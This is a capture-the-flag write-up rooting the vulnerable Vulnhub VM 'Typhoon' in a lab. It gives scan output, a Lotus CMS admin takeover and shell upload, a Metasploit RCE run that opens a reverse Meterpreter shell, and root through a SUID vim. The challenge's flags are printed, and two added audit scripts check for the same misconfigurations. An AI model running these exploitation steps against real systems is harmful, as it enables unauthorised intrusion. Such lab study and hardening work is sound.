Typhoon from Vulnhub, 5 minutes to root

Typhoon from Vulnhub (https://www.vulnhub.com/entry/typhoon-102,267/) is an extremely vulnerable VM. I’m sure there is more than one way to get a privileged shell; I’ll describe the fastest and easiest one.

So, let’s begin with nmap.

Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-19 13:34 EET
NSE: Loaded 43 scripts for scanning.
Initiating ARP Ping Scan at 13:34
Scanning typhoon.local (192.168.56.4) [1 port]
Completed ARP Ping Scan at 13:34, 0.04s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 13:34
Scanning typhoon.local (192.168.56.4) [1000 ports]
Discovered open port 110/tcp on 192.168.56.4
Discovered open port 22/tcp on 192.168.56.4
Discovered open port 80/tcp on 192.168.56.4
Discovered open port 445/tcp on 192.168.56.4
Discovered open port 111/tcp on 192.168.56.4
Discovered open port 8080/tcp on 192.168.56.4
Discovered open port 143/tcp on 192.168.56.4
Discovered open port 53/tcp on 192.168.56.4
Discovered open port 21/tcp on 192.168.56.4
Discovered open port 995/tcp on 192.168.56.4
Discovered open port 3306/tcp on 192.168.56.4
Discovered open port 25/tcp on 192.168.56.4
Discovered open port 993/tcp on 192.168.56.4
Discovered open port 139/tcp on 192.168.56.4
Discovered open port 2049/tcp on 192.168.56.4
Discovered open port 631/tcp on 192.168.56.4
Discovered open port 5432/tcp on 192.168.56.4
Completed SYN Stealth Scan at 13:34, 0.07s elapsed (1000 total ports)
Initiating Service scan at 13:34
Scanning 17 services on typhoon.local (192.168.56.4)
Completed Service scan at 13:34, 14.02s elapsed (17 services on 1 host)
NSE: Script scanning 192.168.56.4.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 13:34
Completed NSE at 13:34, 0.02s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 13:34
Completed NSE at 13:34, 0.01s elapsed
Nmap scan report for typhoon.local (192.168.56.4)
Host is up, received arp-response (0.000046s latency).
Scanned at 2019-01-19 13:34:30 EET for 14s
Not shown: 983 closed ports
Reason: 983 resets
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 64 vsftpd 3.0.2
22/tcp open ssh syn-ack ttl 64 OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
25/tcp open smtp syn-ack ttl 64 Postfix smtpd
53/tcp open domain syn-ack ttl 64 ISC BIND 9.9.5-3 (Ubuntu Linux)
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.7 ((Ubuntu))
110/tcp open pop3 syn-ack ttl 64 Dovecot pop3d
111/tcp open rpcbind syn-ack ttl 64 2-4 (RPC #100000)
139/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap syn-ack ttl 64 Dovecot imapd (Ubuntu)
445/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
631/tcp open ipp syn-ack ttl 64 CUPS 1.7
993/tcp open ssl/imaps? syn-ack ttl 64
995/tcp open ssl/pop3s? syn-ack ttl 64
2049/tcp open nfs_acl syn-ack ttl 64 2-3 (RPC #100227)
3306/tcp open mysql syn-ack ttl 64 MySQL (unauthorized)
5432/tcp open postgresql syn-ack ttl 64 PostgreSQL DB 9.3.3 - 9.3.5
8080/tcp open http syn-ack ttl 64 Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 08:00:27:35:9F:B3 (Oracle VirtualBox virtual NIC)
Service Info: Hosts: typhoon, TYPHOON; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.51 seconds
           Raw packets sent: 1001 (44.028KB) | Rcvd: 1001 (40.096KB)

Wow. A lot of services. I chose to start with HTTP, which is my favourite.

The initial page doesn’t look very helpful, so I launched wfuzz to look for hidden content.

root@kali:~# wfuzz -t 64 --hc 404 -w /usr/share/wordlists/dirb/big.txt typhoon.local/FUZZ


Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.2.11 - The Web Fuzzer *
********************************************************

Target: http://typhoon.local/FUZZ
Total requests: 20469

==================================================================
ID Response Lines Word Chars Payload
==================================================================

000016: C=403 10 L 30 W 289 Ch ".htpasswd"
000015: C=403 10 L 30 W 289 Ch ".htaccess"
002716: C=301 9 L 28 W 314 Ch "assets"
003976: C=301 9 L 28 W 316 Ch "calendar"
004349: C=403 10 L 30 W 288 Ch "cgi-bin/"
004757: C=301 9 L 28 W 311 Ch "cms"
006432: C=301 9 L 28 W 314 Ch "drupal"
010028: C=301 9 L 28 W 318 Ch "javascript"
013833: C=301 9 L 28 W 318 Ch "phpmyadmin"
015551: C=200 2 L 4 W 37 Ch "robots.txt"
016215: C=403 10 L 30 W 293 Ch "server-status"

Total time: 18.12704
Processed Requests: 20469
Filtered Requests: 20458
Requests/sec.: 1129.196

The cms folder contains an installation of a quite old Lotus CMS. I discovered two ways to get in.

As can be seen from the following wfuzz output, install.php was left undeleted. This script allows overwriting the admin credentials. Using those admin credentials, I was able to use the File Manager module to upload my shell. Although the /cms/data/files/ folder is forbidden by /cms/data/.htaccess, the CMS admin is still able to place his own .htaccess in /cms/data/files. This behaviour allowed me to upload a shell to http://typhoon.local/cms/data/files/index.php

root@kali:~# wfuzz -t 64 --hc 404 -w /usr/share/wordlists/dirb/big.txt typhoon.local/cms/FUZZ.php

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.2.11 - The Web Fuzzer                        *
********************************************************

Target: http://typhoon.local/cms/FUZZ.php
Total requests: 20469

==================================================================
ID	Response   Lines      Word         Chars          Payload    
==================================================================

000015:  C=403     10 L	      30 W	    297 Ch	  ".htaccess"
000016:  C=403     10 L	      30 W	    297 Ch	  ".htpasswd"
009563:  C=200     35 L	     136 W	   1587 Ch	  "index"
009721:  C=200     48 L	     150 W	   1968 Ch	  "install"
015719:  C=200      1 L	       5 W	    108 Ch	  "s"
018727:  C=200      0 L	       2 W	     18 Ch	  "update"

Total time: 18.76912
Processed Requests: 20469
Filtered Requests: 20463
Requests/sec.: 1090.567
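The foothold above rests on two deployment mistakes rather than on a code bug: an installer script that survived deployment, and an upload directory in which the web server still honours a per-directory .htaccess (and therefore executes PHP written by the application). The script below is an added example, not code from the write-up or from Lotus CMS; it audits a web root for both conditions. The installer file names and the upload-directory names it looks for are assumptions for this example, and the sample tree it builds is constructed to mirror the layout described above.

```shell
#!/bin/sh
# Added example (not from the original write-up): audit a web root for
#   1. installer/updater scripts left in place after deployment, and
#   2. upload directories that carry their own .htaccess or executable PHP.
# INSTALLER_NAMES and UPLOAD_DIR_NAMES are assumptions for this example;
# adjust them to the application actually deployed.
LC_ALL=C
export LC_ALL

# Installer scripts that should not survive deployment (assumed list).
INSTALLER_NAMES='install.php update.php setup.php upgrade.php'

# Directory names that typically hold user-supplied uploads (assumed list).
UPLOAD_DIR_NAMES='files uploads upload'

# find_leftover_installers WEBROOT: print installer scripts found under WEBROOT.
find_leftover_installers() {
    webroot=$1
    for name in $INSTALLER_NAMES; do
        find "$webroot" -type f -name "$name" 2>/dev/null
    done | sort
}

# find_upload_overrides WEBROOT: print .htaccess files and PHP scripts that
# live inside upload directories. Either means the web server may execute
# content that an application user was able to write there.
find_upload_overrides() {
    webroot=$1
    for dir in $UPLOAD_DIR_NAMES; do
        find "$webroot" -type d -name "$dir" 2>/dev/null
    done | while IFS= read -r uploaddir; do
        find "$uploaddir" -type f \( -name '.htaccess' -o -name '*.php' \) 2>/dev/null
    done | sort
}

# make_sample_webroot: build a CONSTRUCTED tree mirroring the layout from the
# write-up (cms/install.php, cms/data/.htaccess, cms/data/files/...) in a
# temporary directory and print its path.
make_sample_webroot() {
    root=$(mktemp -d)
    mkdir -p "$root/cms/data/files" "$root/assets"
    : > "$root/cms/index.php"
    : > "$root/cms/install.php"
    printf 'Deny from all\n' > "$root/cms/data/.htaccess"
    printf 'Allow from all\n' > "$root/cms/data/files/.htaccess"
    : > "$root/cms/data/files/index.php"
    : > "$root/cms/data/files/photo.jpg"
    : > "$root/assets/style.css"
    printf '%s\n' "$root"
}

# audit_webroot WEBROOT: run both checks and report. Returns 1 when anything
# was found, so the script can run unattended from cron or a CI job.
audit_webroot() {
    webroot=$1
    status=0
    installers=$(find_leftover_installers "$webroot")
    if [ -n "$installers" ]; then
        printf 'Leftover installer scripts:\n%s\n' "$installers"
        status=1
    fi
    overrides=$(find_upload_overrides "$webroot")
    if [ -n "$overrides" ]; then
        printf 'Overrides or PHP inside upload directories:\n%s\n' "$overrides"
        status=1
    fi
    return $status
}

# Audit a real web root if one is given, otherwise the constructed sample.
if [ -n "${1:-}" ]; then
    if audit_webroot "$1"; then echo "clean"; else echo "findings reported (exit status 1)"; fi
else
    sample=$(make_sample_webroot)
    if audit_webroot "$sample"; then echo "clean"; else echo "findings reported (exit status 1)"; fi
    rm -rf "$sample"
fi
```

Run as `sh audit-webroot.sh /var/www/html` on a deployed host; without an argument it audits the constructed sample and reports cms/install.php plus the .htaccess and index.php under cms/data/files. Findings in an upload directory are best fixed at the server rather than the application: configure the directory with AllowOverride None so a dropped .htaccess is ignored, and do not map PHP handlers to it at all.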

The second way is Metasploit. It’s bundled with a nice RCE exploit for Lotus CMS, which doesn’t even need authorization.

root@kali:~# msfconsole 
                                                  

      .:okOOOkdc'           'cdkOOOko:.
    .xOOOOOOOOOOOOc       cOOOOOOOOOOOOx.
   :OOOOOOOOOOOOOOOk,   ,kOOOOOOOOOOOOOOO:
  'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'
  oOOOOOOOO.    .oOOOOoOOOOl.    ,OOOOOOOOo
  dOOOOOOOO.      .cOOOOOc.      ,OOOOOOOOx
  lOOOOOOOO.         ;d;         ,OOOOOOOOl
  .OOOOOOOO.   .;           ;    ,OOOOOOOO.
   cOOOOOOO.   .OOc.     'oOO.   ,OOOOOOOc
    oOOOOOO.   .OOOO.   :OOOO.   ,OOOOOOo
     lOOOOO.   .OOOO.   :OOOO.   ,OOOOOl
      ;OOOO'   .OOOO.   :OOOO.   ;OOOO;
       .dOOo   .OOOOocccxOOOO.   xOOd.
         ,kOl  .OOOOOOOOOOOOO. .dOk,
           :kk;.OOOOOOOOOOOOO.cOk:
             ;kOOOOOOOOOOOOOOOk:
               ,xOOOOOOOOOOOx,
                 .lOOOOOOOl.
                    ,dOd,
                      .

       =[ metasploit v4.17.33-dev                         ]
+ -- --=[ 1843 exploits - 1046 auxiliary - 320 post       ]
+ -- --=[ 541 payloads - 44 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use exploit/multi/http/lcms_php_exec 
msf exploit(multi/http/lcms_php_exec) > info

       Name: LotusCMS 3.0 eval() Remote Command Execution
     Module: exploit/multi/http/lcms_php_exec
   Platform: PHP
       Arch: php
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2011-03-03

Provided by:
  dflah_ 
  sherl0ck_ 
  sinn3r 

Available targets:
  Id  Name
  --  ----
  0   Automatic LotusCMS 3.0

Check supported:
  Yes

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST                     yes       The target address
  RPORT    80               yes       The target port (TCP)
  SSL      false            no        Negotiate SSL/TLS for outgoing connections
  URI      /lcms/           yes       URI
  VHOST                     no        HTTP server virtual host

Payload information:
  Space: 4000
  Avoid: 1 characters

Description:
  This module exploits a vulnerability found in Lotus CMS 3.0's 
  Router() function. This is done by embedding PHP code in the 'page' 
  parameter, which will be passed to a eval call, therefore allowing 
  remote code execution. The module can either automatically pick up a 
  'page' parameter from the default page, or manually specify one in 
  the URI option. To use the automatic method, please supply the URI 
  with just a directory path, for example: "/lcms/". To manually 
  configure one, you may do: "/lcms/somepath/index.php?page=index"

References:
  https://cvedetails.com/cve/CVE-2011-0518/
  OSVDB (75095)
  http://secunia.com/secunia_research/2011-21/

msf exploit(multi/http/lcms_php_exec) > set RHOST typhoon.local
RHOST => typhoon.local
msf exploit(multi/http/lcms_php_exec) > set URI /cms/
URI => /cms/
msf exploit(multi/http/lcms_php_exec) > exploit

[*] Started reverse TCP handler on 192.168.56.3:4444 
[*] Using found page param: /cms/index.php?page=index
[*] Sending exploit ...
[*] Sending stage (38247 bytes) to 192.168.56.4
[*] Meterpreter session 1 opened (192.168.56.3:4444 -> 192.168.56.4:46218) at 2019-01-19 14:32:11 +0200


meterpreter > 
meterpreter > shell
Process 28293 created.
Channel 0 created.
id; uname -a; pwd;
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Linux typhoon.local 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
/var/www/html/cms

That’s it. I got in.

Now root time.

www-data@typhoon:/var/www/html/cms$ find / -type f -perm /u=s,g=s 2>/dev/null
find / -type f -perm /u=s,g=s 2>/dev/null
/usr/sbin/postqueue
/usr/sbin/postdrop
/usr/sbin/uuidd
/usr/sbin/pppd
/usr/bin/head
/usr/bin/lockfile
/usr/bin/crontab
/usr/bin/mail-unlock
/usr/bin/expiry
/usr/bin/newgrp
/usr/bin/bsd-write
/usr/bin/mail-touchlock
/usr/bin/mlocate
/usr/bin/chage
/usr/bin/ssh-agent
/usr/bin/chsh
/usr/bin/lppasswd
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/screen
/usr/bin/wall
/usr/bin/at
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/mail-lock
/usr/bin/mutt_dotlock
/usr/bin/mtr
/usr/bin/dotlockfile
/usr/bin/sudo
/usr/bin/procmail
/usr/bin/vim.basic
/usr/bin/traceroute6.iputils
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/lib/utempter/utempter
/usr/lib/authbind/helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/sbin/mount.cifs
/sbin/unix_chkpwd
/sbin/mount.nfs
/bin/fusermount
/bin/ping6
/bin/mount
/bin/ping
/bin/su
/bin/umount
/usr/bin/vim.basic is SUID, lol.
By simply pressing ESC and issuing the :sh command, I became root.
# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=0(root),33(www-data)
# cat /root/root-flag 
cat /root/root-flag


Typhoon_r00t3r!


# cat /home/admin/.ssh/secr3t
cat /home/admin/.ssh/secr3t


ph00n_typ_p0st_flag!


# 
w00t-w00t. Another one pwned.
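The privilege escalation above is caught by a routine check: any SUID/SGID binary that is not in the image's baseline, and in particular any SUID editor, pager or shell, is a finding. The script below is an added example, not part of the write-up; it runs the same `find` enumeration as above, diffs the result against a baseline, and flags interactive tools by name. The BASELINE list is constructed here from the write-up's own output with /usr/bin/vim.basic removed, and OBSERVED is that output as sample input; on a real host the baseline is recorded from a freshly provisioned image.

```shell
#!/bin/sh
# Added example (not from the original write-up): compare the SUID/SGID
# binaries on a host against a baseline from a clean build of the same image,
# and additionally flag SUID editors, pagers and shells.
# BASELINE is CONSTRUCTED from the write-up's find output minus vim.basic.
LC_ALL=C
export LC_ALL

BASELINE=$(cat <<'EOF'
/usr/sbin/postqueue
/usr/sbin/postdrop
/usr/sbin/uuidd
/usr/sbin/pppd
/usr/bin/head
/usr/bin/lockfile
/usr/bin/crontab
/usr/bin/mail-unlock
/usr/bin/expiry
/usr/bin/newgrp
/usr/bin/bsd-write
/usr/bin/mail-touchlock
/usr/bin/mlocate
/usr/bin/chage
/usr/bin/ssh-agent
/usr/bin/chsh
/usr/bin/lppasswd
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/screen
/usr/bin/wall
/usr/bin/at
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/mail-lock
/usr/bin/mutt_dotlock
/usr/bin/mtr
/usr/bin/dotlockfile
/usr/bin/sudo
/usr/bin/procmail
/usr/bin/traceroute6.iputils
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/lib/utempter/utempter
/usr/lib/authbind/helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/sbin/mount.cifs
/sbin/unix_chkpwd
/sbin/mount.nfs
/bin/fusermount
/bin/ping6
/bin/mount
/bin/ping
/bin/su
/bin/umount
EOF
)

# OBSERVED: sample input, equal to the write-up's list (baseline + vim.basic).
OBSERVED=$(printf '%s\n%s\n' "$BASELINE" "/usr/bin/vim.basic")

# collect_suid: the same enumeration the write-up ran, for use on a live host.
collect_suid() {
    find / -type f -perm /u=s,g=s 2>/dev/null | sort -u
}

# unexpected_suid LIST: print entries of LIST (newline separated) absent from BASELINE.
unexpected_suid() {
    obs=$(mktemp); base=$(mktemp)
    printf '%s\n' "$1" | sort -u > "$obs"
    printf '%s\n' "$BASELINE" | sort -u > "$base"
    comm -23 "$obs" "$base"
    rm -f "$obs" "$base"
}

# flag_interactive: read paths on stdin and print those whose basename is an
# editor, pager or shell, allowing a dotted variant suffix such as vim.basic.
flag_interactive() {
    grep -E '/(vi|vim|nano|ed|less|more|sh|bash|dash|csh|ksh|zsh)(\.[^/]*)?$' || :
}

# Report on the sample list; swap OBSERVED for "$(collect_suid)" on a live host.
# Remediation for a finding is chmod u-s (or the distro's dpkg-statoverride).
extra=$(unexpected_suid "$OBSERVED")
[ -n "$extra" ] && printf 'Not in baseline:\n%s\n' "$extra"
printf '%s\n' "$OBSERVED" | flag_interactive | sed 's|^|Interactive tool with SUID/SGID bit: |'
```

Against the sample input both checks report only /usr/bin/vim.basic. The baseline diff catches anything an administrator added after build, whether or not it has a well-known shell escape, while the name check catches the case where the baseline itself was recorded from an image that already shipped a SUID editor.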